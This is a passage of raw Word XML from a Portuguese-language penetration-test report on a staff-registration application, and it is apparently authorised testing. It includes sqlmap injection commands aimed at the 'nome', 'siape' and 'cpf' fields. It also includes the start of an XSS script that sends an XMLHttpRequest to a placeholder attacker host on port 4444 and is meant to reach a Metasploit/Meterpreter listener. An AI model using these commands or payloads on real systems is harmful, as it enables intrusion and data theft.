        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” o seguinte erro foi exibido:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1.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</w:rPr>
        <w:t>Dessa forma foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> possível identificar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’.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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:softHyphen/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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 6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Usar a ferramenta Sqlmap para realizar a tentativa de injetar SQL na página.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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Salvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap posteriormente.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/>
          <w:iCs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Comando utilizado: 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 w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sqlmap -r paramsTelaConsServidor -p nome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 w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sqlmap -r paramsTelaConsServidor -p siape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 w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlmap -r paramsTelaConsServidor -p cpf --dbms=msql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42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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo p</w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>aramsTelaConsServidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003D141C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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 w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">“--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado para </w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>descobrir qual o banco da aplicação alvo.</w:t>
      </w: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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75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       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4051935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715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27.jpe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Default="009A2041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Figura 28</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Dados da requisição via POST capturada pelo Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultad</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Não passou no teste. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” não são injetáveis conforme mostram as figuras 28, 29 e 30.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4115435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28.jpe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F75" w:rsidRDefault="009A2041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Figura 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75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</w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00A9523B" w:rsidRDefault="00E77F75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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3986530"/>
            <wp:effectExtent l="0" t="0" r="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29.jpe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523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A9523B" w:rsidRDefault="009A2041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Figura 30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape.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Pr="00906B58" w:rsidRDefault="00E77F75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      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4028440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30.jpe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E77F75" w:rsidRDefault="009A2041" w:rsidP="00E77F75">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="005F6E06" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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993" w:hanging="284"/>
        <w:jc w:val="both"/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b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="285" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explorar XSS – Tela Cadastro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E5241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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00751591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Duração: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591" w:rsidP="00751591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr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Utilizar</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o campo de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>incluir um script malicioso que consiga burlar o filtro CORS e realiza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>r uma chamada a um listener do M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">estasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para executar um ataque usando M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00E52417" w:rsidP="00E5241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Para burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma tentativa de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52417" w:rsidRDefault="00E52417" w:rsidP="00E5241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Pr="009A7448" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE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>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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>,’</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
